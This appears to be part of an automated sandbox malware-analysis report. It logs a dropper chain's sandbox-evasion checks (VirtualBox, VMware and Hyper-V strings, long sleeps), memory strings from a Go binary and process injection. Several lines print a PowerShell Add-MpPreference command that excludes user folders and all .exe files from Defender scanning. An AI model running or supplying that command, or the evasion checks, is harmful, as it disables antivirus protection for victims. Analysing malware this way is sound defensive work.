                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        Source: C:\Windows\explorer.exe	System information queried: FirmwareTableInformation
                        Source: C:\Users\user\Desktop\25C1.exe	Memory allocated: 1750000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\25C1.exe	Memory allocated: 3170000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\25C1.exe	Memory allocated: 3090000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\25C1.exe	Memory allocated: 61A0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\25C1.exe	Memory allocated: 71A0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	File opened / queried: VBoxGuest
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	File opened / queried: VBoxTrayIPC
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	File opened / queried: \pipe\VBoxTrayIPC
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	File opened / queried: VBoxMiniRdrDN
                        Source: C:\Users\user\Desktop\25C1.exe	Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7551
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1801
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8290
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1231
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6779
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2675
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7838
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1359
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe	Dropped PE file which has not been started: C:\Windows\Temp\gbfbijmbpkdw.sys
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsr70E6.tmp\INetC.dll
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exe	API coverage: 3.2 %
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe	API coverage: 3.2 %
                        Source: C:\Windows\System32\conhost.exe	API coverage: 1.2 %
                        Source: C:\Users\user\Desktop\25C1.exe TID: 7656	Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exe TID: 7744	Thread sleep time: -31000s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7944	Thread sleep count: 7551 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8076	Thread sleep time: -2767011611056431s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7932	Thread sleep count: 1801 > 30
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7456	Thread sleep time: -5534023222112862s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1832	Thread sleep count: 6779 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3632	Thread sleep count: 2675 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1272	Thread sleep time: -8301034833169293s >= -30000s
                        Source: C:\Windows\explorer.exe TID: 3124	Thread sleep count: 85 > 30
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7680	Thread sleep time: -6456360425798339s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7656	Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                        Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                        Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	Code function: 3_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_00405C63
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	Code function: 3_2_004068B4 FindFirstFileW,FindClose,3_2_004068B4
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	Code function: 3_2_00402910 FindFirstFileW,3_2_00402910
                        Source: BroomSetup.exe, 00000005.00000002.3821713066.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}i
                        Source: InstallSetup4.exe, 00000003.00000002.2242373966.00000000006B3000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000003.2241896798.000000000067B000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000003.2241896798.00000000006B3000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000002.2242373966.000000000067B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp	Binary or memory string: main.isRunningInsideVMWare
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000400000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTTL expiredUninstallerVBoxServiceVMUSrvc.exeVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exeadditionalsalarm clockapplicationassistQueueauthoritiesbad addressbad argSizebad m valuebad messagebad timedivbitcoins.skbroken pipecampaign_idcgocall nilclobberfreeclosesocketcombase.dllcreated by crypt32.dlle2.keff.orgembedded/%sexternal IPfile existsfinal tokenfloat32nan2float64nan1float64nan2float64nan3gccheckmarkgeneralizedget CDN: %wgetpeernamegetsocknameglobalAllochttp2clienthttp2serverhttps_proxyi/o timeoutlocal errormSpanManualmethodargs(minTrigger=move %s: %wmswsock.dllnetpollInitnext servernil contextopera-proxyorannis.comout of syncparse errorprocess: %sreflect.SetreflectOffsretry-afterruntime: P runtime: g runtime: p scheddetailsechost.dllsecur32.dllservice: %sshell32.dllshort writestack tracestart proxytaskmgr.exetls: alert(tracealloc(traffic updunreachableuserenv.dllversion.dllversion=195wininet.dllwup_process (sensitive) B (
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1593892332.000000000C092000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: !This program cannoHKEY_USERS\S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\TestAppHKEY_USERS\S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7Microsoft Windows 10 ProEastern Standard TimeC:\Windows\System32\WindowsPowerShell\v1.0\powershell\\.\pipe\VBoxMiniRdDN\\.\pipe\VBoxTrayIPC
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | Binary or memory string: ermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ... MB, \" and got= max= ms, ptr tab= top=%s %q%s
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | Binary or memory string: yreleasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdo
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | Binary or memory string: sse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ... MB, \" and got= max= ms, ptr tab= top=%s %q%s %s%s*%d%s/%s%s:%d%s=%s&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930.avif.html.jpeg.json.wasm.webp1.4.2156253.2.2500
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000400000.00000040.00000001.01000000.00000006.sdmp | Binary or memory string: GetActiveObjectGetAdaptersInfoGetCommTimeoutsGetCommandLineWGetFirmwareTypeGetProcessTimesGetSecurityInfoGetStartupInfoWGlobal\qtxp9g8wHanifi_RohingyaICE-CONTROLLINGIdempotency-KeyImpersonateSelfInstall failureIsWindowUnicodeIsWindowVisibleIsWow64Process2Length RequiredLoadLibraryExALoadLibraryExWNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512Partial ContentPostQuitMessageProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003660000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000400000.00000040.00000001.01000000.00000006.sdmp | Binary or memory string: SafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenSystemFunction036Too Many RequestsTransfer-EncodingUnexpected escapeUnified_IdeographUnknown AttributeVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseWrong CredentialsX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDN
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | Binary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTTL expiredUninstallerVBoxServiceVMUSrvc.exeVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exeadditionalsalarm clockapplicationassistQueueauthorities
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1479212811.0000000000D9E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllR
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | Binary or memory string: vmusbmousevmware: %wws2_32.dll of size (targetpc= , plugin: ErrCode=%v KiB work, bytes ... exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=$WINDIR\rss%!(BADPREC
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003660000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000400000.00000040.00000001.01000000.00000006.sdmp | Binary or memory string: &gt;&lt;'\'') = ) m=+Inf-Inf.bat.cmd.com.css.exe.gif.htm.jpg.mjs.pdf.png.svg.sys.xml0x%x1.1110803125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCDN=CESTChamDATADashDataDateEESTEULAEtagFromGOGCGoneHostJulyJuneLEAFLisuMiaoModiNZDTNZSTNameNewaPINGPOSTPathQEMUROOTSASTSTARSendStatTempThaiTypeUUID"%s"\rss\smb\u00
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | Binary or memory string: sse42ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...) , i = , not , val -BEFV--D
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | Binary or memory string: eUnprocessable EntityWinmonProcessMonitor\\.\pipe\VBoxTrayIPC^.*\._Ctype_uint8_t$asn1: syntax error: assigned stream ID 0bad font file formatbad system page sizebad use of bucket.bpbad use of bucket.mpcertificate requiredchan send (nil chan)close of nil channe
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | Binary or memory string: rdtscpreadatreasonremoverenamereturnrun-v3rune1 secondselectsendtoserversocketsocks socks5statusstringstructsweep sysmontelnettimersuint16uint32uint64unuseduptimevmhgfsvmxnetvpc-s3wup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> allocs dying=
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | Binary or memory string: potency-Key\System32\drivers\\.\VBoxMiniRdrDN os/exec.Command(^.*\._Ctype_char$bad TinySizeClasscouldn't dial: %wcouldn't find pidcouldn't get UUIDcouldn't get pidscouldn't hide PIDcpu name is emptycreate window: %wdecode server: %wdecryption faileddownload fi
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | Binary or memory string: releasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1479923842.0000000002830000.00000040.00000020.00020000.00000000.sdmp | Binary or memory string: \\.\HGFS`
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | Binary or memory string: lUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | Binary or memory string: MathPOSTALCODEParseAddr(ParseFloatPhoenicianProcessingPulseEventRIPEMD-160RST_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieShowWindowTor uptimeUser-AgentVMSrvc.exeWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10Window
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | Binary or memory string: PalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSTUN addrSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseVBoxVideoWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1479923842.0000000002830000.00000040.00000020.00020000.00000000.sdmp | Binary or memory string: vmhgfsP
                        Source: 25C1.exe, 00000000.00000002.1371770531.00000000012F6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000400000.00000040.00000001.01000000.00000006.sdmp | Binary or memory string: Not ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512Partial ContentPostQuitMessageProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000400000.00000040.00000001.01000000.00000006.sdmp | Binary or memory string: VirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dllauthorizationbad flushGen bad map statebtc.cihar.combtc.xskyx.netcache-controlcontent-rangecouldn't polldalTLDpSugct?data is emptydouble unlockemail addressempty integerexchange fullfatal error: gethostbynamegetservbynamegzip, deflateif-none-matchignoring fileimage/svg+xmlinvalid ASN.1invalid UTF-8invalid base kernel32.dllkey expansionlame referrallast-modifiedlevel 3 resetload64 failedmaster secretmin too largename is emptynil stackbasenot a Float32open file: %wout of memoryparallels: %wparsing time powrprof.dllprl_tools.exeprofMemActiveprofMemFutureread EULA: %wrebooting nowruntime: seq=runtime: val=service stateset event: %wsigner is nilsocks connectsrmount errortimer expiredtraceStackTabtrailing dataunimplementedunsupported: user canceledvalue method virtualpc: %wxadd64 failedxchg64 failed}
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000400000.00000040.00000001.01000000.00000006.sdmp | Binary or memory string: unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wws2_32.dll of size (targetpc= , plugin: ErrCode=%v KiB work, bytes ...
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | Binary or memory string: bmi1bmi2boolcallcap cas1cas2cas3cas4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | Binary or memory string: ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...) , i = , not , val -BEFV--DYOR--
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | Binary or memory string: ultX-Forwarded-For\\.\VBoxTrayIPC] morebuf={pc:accept-encodingaccept-languageadvertise erroragent is closedapplication/pdfasyncpreemptoffbad certificatebad trailer keybefore EfiGuardclass registredclient finishedcouldn't set AVcouldn't set sbdecode hash: %wdo
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000400000.00000040.00000001.01000000.00000006.sdmp | Binary or memory string: VersionVirtualWSARecvWSASend"%s" %stypes value=abortedalt -> answersany -> booleancharsetchunkedcmd.execonnectconsolecpu: %scpuprofderiveddriversexpiresfloat32float64forcegcgctracehead = http://invalidlog.txtlookup messageminpc= nil keynop -> number pacer: panic: readdirrefererrefreshrequestrunningserial:server=signal svc_versyscalltor.exetraileruintptrunknownupgradeversionvmmousevpcuhubwaitingwindowswsarecvwsasendwup_verxen: %wxennet6 bytes, data=%q etypes incr=%v is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= ping=%q pointer stack=[ status %!Month(%02d%02d%s %s:%d%s: 0x%x-cleanup2.5.4.102.5.4.112.5.4.1748828125?4#?'1#0AcceptExAcceptedAllocateAltitudeArmenianBAD RANKBalineseBopomofoBugineseCancelIoCherokeeClassANYConflictContinueCurveID(CyrillicDNS nameDSA-SHA1DecemberDefenderDeleteDCDuployanEULA.txtEqualSidEthiopicExtenderFebruaryFirewallFullPathGeorgianGetOEMCPGoStringGujaratiGurmukhiHTTP/1.1HTTP/2.0HiraganaInstFailInstRuneIsWindowJavaneseKatakanaKayah_LiLIFETIMELinear_ALinear_BLocationLsaCloseMD5+SHA1MahajaniNO_ERRORNO_PROXYNovemberOl_ChikiPRIORITYPROGRESSParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASHA3-224SHA3-256SHA3-384SHA3-512SOFTWARESaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUSERHASHUSERNAMEUgariticVBoxWddmWSAIoctlWinmonFSWmiPrvSE[::1]:53[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnum_gatewayacceptexaddress bad instcgocheckcontinuecs deadlockdefault:dial: %wdnsquerydurationeax ebp ebx ecx edi edx eflags eip embeddedesi esp execwaitexporterf is nilfinishedfs gs hijackedhttp/1.1https://if-matchif-rangeinfinityinjectorinvalid linkpathlocationmac_addrmountvolmsvmmoufno anodeno-cacheno_proxypollDescreadfromrecvfromreflect.runnableruntime.rwmutexRrwmutexWscavengeshutdownstrconv.taskkilltor_modetraceBuftrigger=unixgramunknown(usernamevmmemctlvmx_svgawalk: %wwsaioctlwuauservx509sha1yuio.top (forced) B exp.) B work ( blocked= in use)
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000400000.00000040.00000001.01000000.00000006.sdmp | Binary or memory string: m=] = ] n=allgallparchasn1avx2basebindbitsbmi1bmi2boolcallcap cas1cas2cas3cas4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ...
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | Binary or memory string: bmi2boolcallcap cas1cas2cas3cas4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (a
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | Binary or memory string: swsarecvwsasendwup_verxen: %wxennet6 bytes, data=%q etypes incr=%v is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= ping=%q pointer stack=[ status %!Month(%02d%02d%s %s:%d%s: 0x%x-cleanup2.5.4.102.5.4.112.5.4.1748828125?4#?'1#0AcceptExAccepted
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | Binary or memory string: too many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservi
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | Binary or memory string: ddrmountvolmsvmmoufno anodeno-cacheno_proxypollDescreadfromrecvfromreflect.runnableruntime.rwmutexRrwmutexWscavengeshutdownstrconv.taskkilltor_modetraceBuftrigger=unixgramunknown(usernamevmmemctlvmx_svgawalk: %wwsaioctlwuauservx509sha1yuio.top (forced) B exp.)
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | Binary or memory string: rayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\Def
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | API call chain: ExitProcess graph end node
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Process information queried: ProcessInformation
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Code function: 2_2_028300A3 push dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Code function: 32_2_0299E0A3 push dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Process token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exe | Code function: 4_2_00007FF69A531160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,exit,
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe | Code function: 27_2_00007FF7EE4A1160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,exit,
                        Source: C:\Windows\System32\conhost.exe | Code function: 37_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,
                        Source: C:\Users\user\Desktop\25C1.exe | Memory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion

                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe | Memory written: PID: 2836 base: 140000000 value: 4D
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe | Memory written: PID: 2836 base: 140001000 value: NU
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe | Memory written: PID: 2836 base: 140674000 value: DF
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe | Memory written: PID: 2836 base: 140847000 value: 00
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe | Memory written: PID: 2836 base: 10D5010 value: 00
